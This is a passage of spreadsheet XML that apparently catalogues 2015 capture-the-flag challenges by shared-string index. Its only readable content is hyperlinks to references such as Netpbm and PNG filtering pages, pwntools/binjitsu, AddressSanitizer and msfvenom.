      <c r="RO157" s="105"/>
      <c r="RP157" s="105"/>
      <c r="RQ157" s="105"/>
      <c r="RR157" s="105"/>
      <c r="RS157" s="105"/>
      <c r="RT157" s="105"/>
      <c r="RU157" s="105"/>
      <c r="RV157" s="105"/>
      <c r="RW157" s="105"/>
      <c r="RX157" s="105"/>
      <c r="RY157" s="105"/>
      <c r="RZ157" s="105"/>
      <c r="SA157" s="105"/>
      <c r="SB157" s="105"/>
      <c r="SC157" s="105"/>
      <c r="SD157" s="105"/>
      <c r="SE157" s="105"/>
      <c r="SF157" s="105"/>
      <c r="SG157" s="105"/>
      <c r="SH157" s="105"/>
      <c r="SI157" s="105"/>
      <c r="SJ157" s="105"/>
      <c r="SK157" s="105"/>
      <c r="SL157" s="105"/>
      <c r="SM157" s="105"/>
      <c r="SN157" s="105"/>
      <c r="SO157" s="105"/>
      <c r="SP157" s="105"/>
      <c r="SQ157" s="105"/>
      <c r="SR157" s="105"/>
      <c r="SS157" s="105"/>
      <c r="ST157" s="105"/>
      <c r="SU157" s="105"/>
      <c r="SV157" s="105"/>
      <c r="SW157" s="105"/>
      <c r="SX157" s="105"/>
      <c r="SY157" s="105"/>
      <c r="SZ157" s="105"/>
      <c r="TA157" s="105"/>
      <c r="TB157" s="105"/>
      <c r="TC157" s="105"/>
      <c r="TD157" s="105"/>
      <c r="TE157" s="105"/>
      <c r="TF157" s="105"/>
      <c r="TG157" s="105"/>
      <c r="TH157" s="105"/>
      <c r="TI157" s="105"/>
      <c r="TJ157" s="105"/>
      <c r="TK157" s="105"/>
      <c r="TL157" s="105"/>
      <c r="TM157" s="105"/>
      <c r="TN157" s="105"/>
      <c r="TO157" s="105"/>
      <c r="TP157" s="105"/>
      <c r="TQ157" s="105"/>
      <c r="TR157" s="105"/>
      <c r="TS157" s="105"/>
      <c r="TT157" s="105"/>
      <c r="TU157" s="105"/>
      <c r="TV157" s="105"/>
      <c r="TW157" s="105"/>
      <c r="TX157" s="105"/>
      <c r="TY157" s="105"/>
      <c r="TZ157" s="105"/>
      <c r="UA157" s="105"/>
      <c r="UB157" s="105"/>
      <c r="UC157" s="105"/>
      <c r="UD157" s="105"/>
      <c r="UE157" s="105"/>
      <c r="UF157" s="105"/>
      <c r="UG157" s="105"/>
      <c r="UH157" s="105"/>
      <c r="UI157" s="105"/>
      <c r="UJ157" s="105"/>
      <c r="UK157" s="105"/>
      <c r="UL157" s="105"/>
      <c r="UM157" s="105"/>
      <c r="UN157" s="105"/>
      <c r="UO157" s="105"/>
      <c r="UP157" s="105"/>
      <c r="UQ157" s="105"/>
      <c r="UR157" s="105"/>
      <c r="US157" s="105"/>
      <c r="UT157" s="105"/>
      <c r="UU157" s="105"/>
      <c r="UV157" s="105"/>
      <c r="UW157" s="105"/>
      <c r="UX157" s="105"/>
      <c r="UY157" s="105"/>
      <c r="UZ157" s="105"/>
      <c r="VA157" s="105"/>
      <c r="VB157" s="105"/>
      <c r="VC157" s="105"/>
      <c r="VD157" s="105"/>
      <c r="VE157" s="105"/>
      <c r="VF157" s="105"/>
      <c r="VG157" s="105"/>
      <c r="VH157" s="105"/>
      <c r="VI157" s="105"/>
      <c r="VJ157" s="105"/>
      <c r="VK157" s="105"/>
      <c r="VL157" s="105"/>
      <c r="VM157" s="105"/>
      <c r="VN157" s="105"/>
      <c r="VO157" s="105"/>
      <c r="VP157" s="105"/>
      <c r="VQ157" s="105"/>
      <c r="VR157" s="105"/>
      <c r="VS157" s="105"/>
      <c r="VT157" s="105"/>
      <c r="VU157" s="105"/>
      <c r="VV157" s="105"/>
      <c r="VW157" s="105"/>
      <c r="VX157" s="105"/>
      <c r="VY157" s="105"/>
      <c r="VZ157" s="105"/>
      <c r="WA157" s="105"/>
      <c r="WB157" s="105"/>
      <c r="WC157" s="105"/>
      <c r="WD157" s="105"/>
      <c r="WE157" s="105"/>
      <c r="WF157" s="105"/>
      <c r="WG157" s="105"/>
      <c r="WH157" s="105"/>
      <c r="WI157" s="105"/>
      <c r="WJ157" s="105"/>
      <c r="WK157" s="105"/>
      <c r="WL157" s="105"/>
      <c r="WM157" s="105"/>
      <c r="WN157" s="105"/>
      <c r="WO157" s="105"/>
      <c r="WP157" s="105"/>
      <c r="WQ157" s="105"/>
      <c r="WR157" s="105"/>
      <c r="WS157" s="105"/>
      <c r="WT157" s="105"/>
      <c r="WU157" s="105"/>
      <c r="WV157" s="105"/>
      <c r="WW157" s="105"/>
      <c r="WX157" s="105"/>
      <c r="WY157" s="105"/>
      <c r="WZ157" s="105"/>
      <c r="XA157" s="105"/>
      <c r="XB157" s="105"/>
      <c r="XC157" s="105"/>
      <c r="XD157" s="105"/>
      <c r="XE157" s="105"/>
      <c r="XF157" s="105"/>
      <c r="XG157" s="105"/>
      <c r="XH157" s="105"/>
      <c r="XI157" s="105"/>
      <c r="XJ157" s="105"/>
      <c r="XK157" s="105"/>
      <c r="XL157" s="105"/>
      <c r="XM157" s="105"/>
      <c r="XN157" s="105"/>
      <c r="XO157" s="105"/>
      <c r="XP157" s="105"/>
      <c r="XQ157" s="105"/>
      <c r="XR157" s="105"/>
      <c r="XS157" s="105"/>
      <c r="XT157" s="105"/>
      <c r="XU157" s="105"/>
      <c r="XV157" s="105"/>
      <c r="XW157" s="105"/>
      <c r="XX157" s="105"/>
      <c r="XY157" s="105"/>
      <c r="XZ157" s="105"/>
      <c r="YA157" s="105"/>
      <c r="YB157" s="105"/>
      <c r="YC157" s="105"/>
      <c r="YD157" s="105"/>
      <c r="YE157" s="105"/>
      <c r="YF157" s="105"/>
      <c r="YG157" s="105"/>
      <c r="YH157" s="105"/>
      <c r="YI157" s="105"/>
      <c r="YJ157" s="105"/>
      <c r="YK157" s="105"/>
      <c r="YL157" s="105"/>
      <c r="YM157" s="105"/>
      <c r="YN157" s="105"/>
      <c r="YO157" s="105"/>
      <c r="YP157" s="105"/>
      <c r="YQ157" s="105"/>
      <c r="YR157" s="105"/>
      <c r="YS157" s="105"/>
      <c r="YT157" s="105"/>
      <c r="YU157" s="105"/>
      <c r="YV157" s="105"/>
      <c r="YW157" s="105"/>
      <c r="YX157" s="105"/>
      <c r="YY157" s="105"/>
      <c r="YZ157" s="105"/>
      <c r="ZA157" s="105"/>
      <c r="ZB157" s="105"/>
      <c r="ZC157" s="105"/>
      <c r="ZD157" s="105"/>
      <c r="ZE157" s="105"/>
      <c r="ZF157" s="105"/>
      <c r="ZG157" s="105"/>
      <c r="ZH157" s="105"/>
      <c r="ZI157" s="105"/>
      <c r="ZJ157" s="105"/>
      <c r="ZK157" s="105"/>
      <c r="ZL157" s="105"/>
      <c r="ZM157" s="105"/>
      <c r="ZN157" s="105"/>
      <c r="ZO157" s="105"/>
      <c r="ZP157" s="105"/>
      <c r="ZQ157" s="105"/>
      <c r="ZR157" s="105"/>
      <c r="ZS157" s="105"/>
      <c r="ZT157" s="105"/>
      <c r="ZU157" s="105"/>
      <c r="ZV157" s="105"/>
      <c r="ZW157" s="105"/>
      <c r="ZX157" s="105"/>
      <c r="ZY157" s="105"/>
      <c r="ZZ157" s="105"/>
      <c r="AAA157" s="105"/>
      <c r="AAB157" s="105"/>
      <c r="AAC157" s="105"/>
      <c r="AAD157" s="105"/>
      <c r="AAE157" s="105"/>
      <c r="AAF157" s="105"/>
      <c r="AAG157" s="105"/>
      <c r="AAH157" s="105"/>
      <c r="AAI157" s="105"/>
      <c r="AAJ157" s="105"/>
      <c r="AAK157" s="105"/>
      <c r="AAL157" s="105"/>
      <c r="AAM157" s="105"/>
      <c r="AAN157" s="105"/>
      <c r="AAO157" s="105"/>
      <c r="AAP157" s="105"/>
      <c r="AAQ157" s="105"/>
      <c r="AAR157" s="105"/>
      <c r="AAS157" s="105"/>
      <c r="AAT157" s="105"/>
      <c r="AAU157" s="105"/>
      <c r="AAV157" s="105"/>
      <c r="AAW157" s="105"/>
      <c r="AAX157" s="105"/>
      <c r="AAY157" s="105"/>
      <c r="AAZ157" s="105"/>
      <c r="ABA157" s="105"/>
      <c r="ABB157" s="105"/>
      <c r="ABC157" s="105"/>
      <c r="ABD157" s="105"/>
      <c r="ABE157" s="105"/>
      <c r="ABF157" s="105"/>
      <c r="ABG157" s="105"/>
      <c r="ABH157" s="105"/>
      <c r="ABI157" s="105"/>
      <c r="ABJ157" s="105"/>
      <c r="ABK157" s="105"/>
      <c r="ABL157" s="105"/>
      <c r="ABM157" s="105"/>
      <c r="ABN157" s="105"/>
      <c r="ABO157" s="105"/>
      <c r="ABP157" s="105"/>
      <c r="ABQ157" s="105"/>
      <c r="ABR157" s="105"/>
      <c r="ABS157" s="105"/>
      <c r="ABT157" s="105"/>
      <c r="ABU157" s="105"/>
      <c r="ABV157" s="105"/>
      <c r="ABW157" s="105"/>
      <c r="ABX157" s="105"/>
      <c r="ABY157" s="105"/>
      <c r="ABZ157" s="105"/>
      <c r="ACA157" s="105"/>
      <c r="ACB157" s="105"/>
      <c r="ACC157" s="105"/>
      <c r="ACD157" s="105"/>
      <c r="ACE157" s="105"/>
      <c r="ACF157" s="105"/>
      <c r="ACG157" s="105"/>
      <c r="ACH157" s="105"/>
      <c r="ACI157" s="105"/>
      <c r="ACJ157" s="105"/>
      <c r="ACK157" s="105"/>
      <c r="ACL157" s="105"/>
      <c r="ACM157" s="105"/>
      <c r="ACN157" s="105"/>
      <c r="ACO157" s="105"/>
      <c r="ACP157" s="105"/>
      <c r="ACQ157" s="105"/>
      <c r="ACR157" s="105"/>
      <c r="ACS157" s="105"/>
      <c r="ACT157" s="105"/>
      <c r="ACU157" s="105"/>
      <c r="ACV157" s="105"/>
      <c r="ACW157" s="105"/>
      <c r="ACX157" s="105"/>
      <c r="ACY157" s="105"/>
      <c r="ACZ157" s="105"/>
      <c r="ADA157" s="105"/>
      <c r="ADB157" s="105"/>
      <c r="ADC157" s="105"/>
      <c r="ADD157" s="105"/>
      <c r="ADE157" s="105"/>
      <c r="ADF157" s="105"/>
      <c r="ADG157" s="105"/>
      <c r="ADH157" s="105"/>
      <c r="ADI157" s="105"/>
      <c r="ADJ157" s="105"/>
      <c r="ADK157" s="105"/>
      <c r="ADL157" s="105"/>
      <c r="ADM157" s="105"/>
      <c r="ADN157" s="105"/>
      <c r="ADO157" s="105"/>
      <c r="ADP157" s="105"/>
      <c r="ADQ157" s="105"/>
      <c r="ADR157" s="105"/>
      <c r="ADS157" s="105"/>
      <c r="ADT157" s="105"/>
      <c r="ADU157" s="105"/>
      <c r="ADV157" s="105"/>
      <c r="ADW157" s="105"/>
      <c r="ADX157" s="105"/>
      <c r="ADY157" s="105"/>
      <c r="ADZ157" s="105"/>
      <c r="AEA157" s="105"/>
      <c r="AEB157" s="105"/>
      <c r="AEC157" s="105"/>
      <c r="AED157" s="105"/>
      <c r="AEE157" s="105"/>
      <c r="AEF157" s="105"/>
      <c r="AEG157" s="105"/>
      <c r="AEH157" s="105"/>
      <c r="AEI157" s="105"/>
      <c r="AEJ157" s="105"/>
      <c r="AEK157" s="105"/>
      <c r="AEL157" s="105"/>
      <c r="AEM157" s="105"/>
      <c r="AEN157" s="105"/>
      <c r="AEO157" s="105"/>
      <c r="AEP157" s="105"/>
      <c r="AEQ157" s="105"/>
      <c r="AER157" s="105"/>
      <c r="AES157" s="105"/>
      <c r="AET157" s="105"/>
      <c r="AEU157" s="105"/>
      <c r="AEV157" s="105"/>
      <c r="AEW157" s="105"/>
      <c r="AEX157" s="105"/>
      <c r="AEY157" s="105"/>
      <c r="AEZ157" s="105"/>
      <c r="AFA157" s="105"/>
      <c r="AFB157" s="105"/>
      <c r="AFC157" s="105"/>
      <c r="AFD157" s="105"/>
      <c r="AFE157" s="105"/>
      <c r="AFF157" s="105"/>
      <c r="AFG157" s="105"/>
      <c r="AFH157" s="105"/>
      <c r="AFI157" s="105"/>
      <c r="AFJ157" s="105"/>
      <c r="AFK157" s="105"/>
      <c r="AFL157" s="105"/>
      <c r="AFM157" s="105"/>
      <c r="AFN157" s="105"/>
      <c r="AFO157" s="105"/>
      <c r="AFP157" s="105"/>
      <c r="AFQ157" s="105"/>
      <c r="AFR157" s="105"/>
      <c r="AFS157" s="105"/>
      <c r="AFT157" s="105"/>
      <c r="AFU157" s="105"/>
      <c r="AFV157" s="105"/>
      <c r="AFW157" s="105"/>
      <c r="AFX157" s="105"/>
      <c r="AFY157" s="105"/>
      <c r="AFZ157" s="105"/>
      <c r="AGA157" s="105"/>
      <c r="AGB157" s="105"/>
      <c r="AGC157" s="105"/>
      <c r="AGD157" s="105"/>
      <c r="AGE157" s="105"/>
      <c r="AGF157" s="105"/>
      <c r="AGG157" s="105"/>
      <c r="AGH157" s="105"/>
      <c r="AGI157" s="105"/>
      <c r="AGJ157" s="105"/>
      <c r="AGK157" s="105"/>
      <c r="AGL157" s="105"/>
      <c r="AGM157" s="105"/>
      <c r="AGN157" s="105"/>
      <c r="AGO157" s="105"/>
      <c r="AGP157" s="105"/>
      <c r="AGQ157" s="105"/>
      <c r="AGR157" s="105"/>
      <c r="AGS157" s="105"/>
      <c r="AGT157" s="105"/>
      <c r="AGU157" s="105"/>
      <c r="AGV157" s="105"/>
      <c r="AGW157" s="105"/>
      <c r="AGX157" s="105"/>
      <c r="AGY157" s="105"/>
      <c r="AGZ157" s="105"/>
      <c r="AHA157" s="105"/>
      <c r="AHB157" s="105"/>
      <c r="AHC157" s="105"/>
      <c r="AHD157" s="105"/>
      <c r="AHE157" s="105"/>
      <c r="AHF157" s="105"/>
      <c r="AHG157" s="105"/>
      <c r="AHH157" s="105"/>
      <c r="AHI157" s="105"/>
      <c r="AHJ157" s="105"/>
      <c r="AHK157" s="105"/>
      <c r="AHL157" s="105"/>
      <c r="AHM157" s="105"/>
      <c r="AHN157" s="105"/>
      <c r="AHO157" s="105"/>
      <c r="AHP157" s="105"/>
      <c r="AHQ157" s="105"/>
      <c r="AHR157" s="105"/>
      <c r="AHS157" s="105"/>
      <c r="AHT157" s="105"/>
      <c r="AHU157" s="105"/>
      <c r="AHV157" s="105"/>
      <c r="AHW157" s="105"/>
      <c r="AHX157" s="105"/>
      <c r="AHY157" s="105"/>
      <c r="AHZ157" s="105"/>
      <c r="AIA157" s="105"/>
      <c r="AIB157" s="105"/>
      <c r="AIC157" s="105"/>
      <c r="AID157" s="105"/>
      <c r="AIE157" s="105"/>
      <c r="AIF157" s="105"/>
      <c r="AIG157" s="105"/>
      <c r="AIH157" s="105"/>
      <c r="AII157" s="105"/>
      <c r="AIJ157" s="105"/>
      <c r="AIK157" s="105"/>
      <c r="AIL157" s="105"/>
      <c r="AIM157" s="105"/>
      <c r="AIN157" s="105"/>
      <c r="AIO157" s="105"/>
      <c r="AIP157" s="105"/>
      <c r="AIQ157" s="105"/>
      <c r="AIR157" s="105"/>
      <c r="AIS157" s="105"/>
      <c r="AIT157" s="105"/>
      <c r="AIU157" s="105"/>
      <c r="AIV157" s="105"/>
      <c r="AIW157" s="105"/>
      <c r="AIX157" s="105"/>
      <c r="AIY157" s="105"/>
      <c r="AIZ157" s="105"/>
      <c r="AJA157" s="105"/>
      <c r="AJB157" s="105"/>
      <c r="AJC157" s="105"/>
      <c r="AJD157" s="105"/>
      <c r="AJE157" s="105"/>
      <c r="AJF157" s="105"/>
      <c r="AJG157" s="105"/>
      <c r="AJH157" s="105"/>
      <c r="AJI157" s="105"/>
      <c r="AJJ157" s="105"/>
      <c r="AJK157" s="105"/>
      <c r="AJL157" s="105"/>
      <c r="AJM157" s="105"/>
      <c r="AJN157" s="105"/>
      <c r="AJO157" s="105"/>
      <c r="AJP157" s="105"/>
      <c r="AJQ157" s="105"/>
      <c r="AJR157" s="105"/>
      <c r="AJS157" s="105"/>
      <c r="AJT157" s="105"/>
      <c r="AJU157" s="105"/>
      <c r="AJV157" s="105"/>
      <c r="AJW157" s="105"/>
      <c r="AJX157" s="105"/>
      <c r="AJY157" s="105"/>
      <c r="AJZ157" s="105"/>
      <c r="AKA157" s="105"/>
      <c r="AKB157" s="105"/>
      <c r="AKC157" s="105"/>
      <c r="AKD157" s="105"/>
      <c r="AKE157" s="105"/>
      <c r="AKF157" s="105"/>
      <c r="AKG157" s="105"/>
      <c r="AKH157" s="105"/>
      <c r="AKI157" s="105"/>
      <c r="AKJ157" s="105"/>
      <c r="AKK157" s="105"/>
      <c r="AKL157" s="105"/>
      <c r="AKM157" s="105"/>
      <c r="AKN157" s="105"/>
      <c r="AKO157" s="105"/>
      <c r="AKP157" s="105"/>
      <c r="AKQ157" s="105"/>
      <c r="AKR157" s="105"/>
      <c r="AKS157" s="105"/>
      <c r="AKT157" s="105"/>
      <c r="AKU157" s="105"/>
      <c r="AKV157" s="105"/>
      <c r="AKW157" s="105"/>
      <c r="AKX157" s="105"/>
      <c r="AKY157" s="105"/>
      <c r="AKZ157" s="105"/>
      <c r="ALA157" s="105"/>
      <c r="ALB157" s="105"/>
      <c r="ALC157" s="105"/>
      <c r="ALD157" s="105"/>
      <c r="ALE157" s="105"/>
      <c r="ALF157" s="105"/>
      <c r="ALG157" s="105"/>
      <c r="ALH157" s="105"/>
      <c r="ALI157" s="105"/>
      <c r="ALJ157" s="105"/>
      <c r="ALK157" s="105"/>
      <c r="ALL157" s="105"/>
      <c r="ALM157" s="105"/>
      <c r="ALN157" s="105"/>
      <c r="ALO157" s="105"/>
      <c r="ALP157" s="105"/>
      <c r="ALQ157" s="105"/>
      <c r="ALR157" s="105"/>
      <c r="ALS157" s="105"/>
      <c r="ALT157" s="105"/>
      <c r="ALU157" s="105"/>
      <c r="ALV157" s="105"/>
      <c r="ALW157" s="105"/>
      <c r="ALX157" s="105"/>
      <c r="ALY157" s="105"/>
      <c r="ALZ157" s="105"/>
      <c r="AMA157" s="105"/>
      <c r="AMB157" s="105"/>
      <c r="AMC157" s="105"/>
      <c r="AMD157" s="105"/>
      <c r="AME157" s="105"/>
      <c r="AMF157" s="105"/>
      <c r="AMG157" s="105"/>
      <c r="AMH157" s="105"/>
      <c r="AMI157" s="105"/>
      <c r="AMJ157" s="105"/>
      <c r="AMK157" s="105"/>
    </row>
    <row r="158">
      <c r="A158" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B158" s="31">
        <v>2015.0</v>
      </c>
      <c r="C158" s="30" t="s">
        <v>2622</v>
      </c>
      <c r="D158" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E158" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F158" s="35" t="s">
        <v>2623</v>
      </c>
      <c r="G158" s="35" t="s">
        <v>130</v>
      </c>
      <c r="H158" s="30"/>
      <c r="I158" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B159" s="31">
        <v>2015.0</v>
      </c>
      <c r="C159" s="30" t="s">
        <v>2630</v>
      </c>
      <c r="D159" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E159" s="30" t="s">
        <v>186</v>
      </c>
      <c r="F159" s="35" t="s">
        <v>2631</v>
      </c>
      <c r="G159" s="30" t="s">
        <v>2632</v>
      </c>
      <c r="H159" s="30"/>
      <c r="I159" s="30"/>
    </row>
    <row r="160">
      <c r="A160" s="40" t="s">
        <v>1176</v>
      </c>
      <c r="B160" s="40">
        <v>2015.0</v>
      </c>
      <c r="C160" s="40" t="s">
        <v>2652</v>
      </c>
      <c r="D160" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E160" s="40" t="s">
        <v>407</v>
      </c>
      <c r="F160" s="40" t="s">
        <v>130</v>
      </c>
      <c r="G160" s="40" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="17">
        <v>42570.0</v>
      </c>
      <c r="B161" s="65"/>
      <c r="C161" s="65"/>
      <c r="D161" s="65"/>
      <c r="E161" s="9"/>
      <c r="F161" s="65"/>
      <c r="G161" s="65"/>
      <c r="H161" s="66"/>
      <c r="I161" s="9"/>
      <c r="J161" s="9"/>
      <c r="K161" s="9"/>
      <c r="L161" s="9"/>
      <c r="M161" s="9"/>
      <c r="N161" s="9"/>
      <c r="O161" s="9"/>
      <c r="P161" s="9"/>
      <c r="Q161" s="9"/>
      <c r="R161" s="9"/>
      <c r="S161" s="9"/>
      <c r="T161" s="9"/>
      <c r="U161" s="9"/>
      <c r="V161" s="9"/>
      <c r="W161" s="9"/>
      <c r="X161" s="9"/>
      <c r="Y161" s="9"/>
      <c r="Z161" s="9"/>
    </row>
    <row r="162">
      <c r="A162" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B162" s="31">
        <v>2015.0</v>
      </c>
      <c r="C162" s="30" t="s">
        <v>2687</v>
      </c>
      <c r="D162" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E162" s="30" t="s">
        <v>2690</v>
      </c>
      <c r="F162" s="35" t="s">
        <v>2691</v>
      </c>
      <c r="G162" s="30" t="s">
        <v>2694</v>
      </c>
      <c r="H162" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I162" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B163" s="31">
        <v>2015.0</v>
      </c>
      <c r="C163" s="30" t="s">
        <v>2718</v>
      </c>
      <c r="D163" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E163" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F163" s="35" t="s">
        <v>2729</v>
      </c>
      <c r="G163" s="30" t="s">
        <v>2731</v>
      </c>
      <c r="H163" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I163" s="30"/>
    </row>
    <row r="164">
      <c r="A164" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B164" s="31">
        <v>2015.0</v>
      </c>
      <c r="C164" s="30" t="s">
        <v>2753</v>
      </c>
      <c r="D164" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E164" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F164" s="35" t="s">
        <v>2755</v>
      </c>
      <c r="G164" s="30" t="s">
        <v>2760</v>
      </c>
      <c r="H164" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Netpbm_format","Pbm Format Wiki")</f>
        <v>Pbm Format Wiki</v>
      </c>
      <c r="I164" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Portable_Network_Graphics#Filtering","PNG Filtering Wiki")</f>
        <v>PNG Filtering Wiki</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B165" s="31">
        <v>2015.0</v>
      </c>
      <c r="C165" s="30" t="s">
        <v>2795</v>
      </c>
      <c r="D165" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E165" s="30" t="s">
        <v>1831</v>
      </c>
      <c r="F165" s="35" t="s">
        <v>2797</v>
      </c>
      <c r="G165" s="53" t="s">
        <v>2803</v>
      </c>
      <c r="H165" s="33" t="str">
        <f t="shared" ref="H165:H166" si="1">HYPERLINK("https://github.com/binjitsu/binjitsu/","binjit.su")</f>
        <v>binjit.su</v>
      </c>
      <c r="I165" s="30"/>
    </row>
    <row r="166">
      <c r="A166" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B166" s="31">
        <v>2015.0</v>
      </c>
      <c r="C166" s="30" t="s">
        <v>2816</v>
      </c>
      <c r="D166" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E166" s="30" t="s">
        <v>1831</v>
      </c>
      <c r="F166" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G166" s="30" t="s">
        <v>2819</v>
      </c>
      <c r="H166" s="33" t="str">
        <f t="shared" si="1"/>
        <v>binjit.su</v>
      </c>
      <c r="I166" s="30"/>
    </row>
    <row r="167">
      <c r="A167" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B167" s="31">
        <v>2015.0</v>
      </c>
      <c r="C167" s="30" t="s">
        <v>2838</v>
      </c>
      <c r="D167" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E167" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F167" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G167" s="30" t="s">
        <v>2846</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B168" s="31">
        <v>2015.0</v>
      </c>
      <c r="C168" s="30" t="s">
        <v>2851</v>
      </c>
      <c r="D168" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E168" s="30" t="s">
        <v>2853</v>
      </c>
      <c r="F168" s="35" t="s">
        <v>2854</v>
      </c>
      <c r="G168" s="30" t="s">
        <v>2855</v>
      </c>
      <c r="H168" s="33" t="str">
        <f>HYPERLINK("https://m.reddit.com/r/netsec/comments/4rba32/perform_effective_command_injection_attacks_like/","Perform effective command injection attacks")</f>
        <v>Perform effective command injection attacks</v>
      </c>
      <c r="I168" s="30"/>
    </row>
    <row r="169">
      <c r="A169" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B169" s="31">
        <v>2015.0</v>
      </c>
      <c r="C169" s="30" t="s">
        <v>2867</v>
      </c>
      <c r="D169" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E169" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F169" s="35" t="s">
        <v>2869</v>
      </c>
      <c r="G169" s="30" t="s">
        <v>2871</v>
      </c>
      <c r="H169" s="33" t="str">
        <f>HYPERLINK("https://github.com/google/sanitizers","Address Sanitizer")</f>
        <v>Address Sanitizer</v>
      </c>
      <c r="I169" s="33" t="str">
        <f>HYPERLINK("http://scarybeastsecurity.blogspot.nl/2014/09/using-asan-as-protection.html","Use of ASAN as a protection")</f>
        <v>Use of ASAN as a protection</v>
      </c>
      <c r="J169" s="30"/>
    </row>
    <row r="170">
      <c r="A170" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B170" s="31">
        <v>2015.0</v>
      </c>
      <c r="C170" s="30" t="s">
        <v>2880</v>
      </c>
      <c r="D170" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E170" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F170" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G170" s="30" t="s">
        <v>2881</v>
      </c>
      <c r="H170" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I170" s="30"/>
      <c r="J170" s="30"/>
    </row>
    <row r="171">
      <c r="A171" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B171" s="31">
        <v>2015.0</v>
      </c>
      <c r="C171" s="30" t="s">
        <v>2880</v>
      </c>
      <c r="D171" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E171" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F171" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G171" s="30" t="s">
        <v>2881</v>
      </c>
      <c r="H171" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I171" s="30"/>
    </row>
    <row r="172">
      <c r="A172" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B172" s="31">
        <v>2015.0</v>
      </c>
      <c r="C172" s="30" t="s">
        <v>2902</v>
      </c>
      <c r="D172" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E172" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F172" s="35" t="s">
        <v>2905</v>
      </c>
      <c r="G172" s="30" t="s">
        <v>2906</v>
      </c>
      <c r="H172" s="30" t="s">
        <v>2907</v>
      </c>
      <c r="I172" s="30"/>
    </row>
    <row r="173">
      <c r="A173" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B173" s="31">
        <v>2015.0</v>
      </c>
      <c r="C173" s="30" t="s">
        <v>2910</v>
      </c>
      <c r="D173" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E173" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F173" s="35" t="s">
        <v>2911</v>
      </c>
      <c r="G173" s="30" t="s">
        <v>2912</v>
      </c>
      <c r="H173" s="33" t="str">
        <f>HYPERLINK("https://www.offensive-security.com/metasploit-unleashed/msfvenom/","msfvenom")</f>
        <v>msfvenom</v>
      </c>
      <c r="I173" s="30"/>
    </row>
    <row r="174">
      <c r="A174" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B174" s="31">
        <v>2015.0</v>
      </c>
      <c r="C174" s="30" t="s">
        <v>2925</v>
      </c>
      <c r="D174" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E174" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F174" s="35" t="s">
        <v>2928</v>
      </c>
      <c r="G174" s="30" t="s">
        <v>2930</v>
      </c>
      <c r="H174" s="30"/>
      <c r="I174" s="30"/>
    </row>
    <row r="175">
      <c r="A175" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B175" s="31">
        <v>2015.0</v>
      </c>
      <c r="C175" s="30" t="s">
        <v>2940</v>
      </c>
      <c r="D175" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E175" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F175" s="35" t="s">
        <v>2943</v>
      </c>
      <c r="G175" s="30" t="s">
        <v>2945</v>
      </c>
      <c r="H175" s="30" t="s">
        <v>2947</v>
      </c>
      <c r="I175" s="30"/>
    </row>
    <row r="176">
      <c r="A176" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B176" s="31">
        <v>2015.0</v>
      </c>
      <c r="C176" s="30" t="s">
        <v>2956</v>
      </c>
      <c r="D176" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E176" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F176" s="35" t="s">
        <v>2959</v>
      </c>
      <c r="G176" s="30" t="s">
        <v>2960</v>
      </c>
      <c r="H176" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I176" s="30"/>
    </row>
    <row r="177">
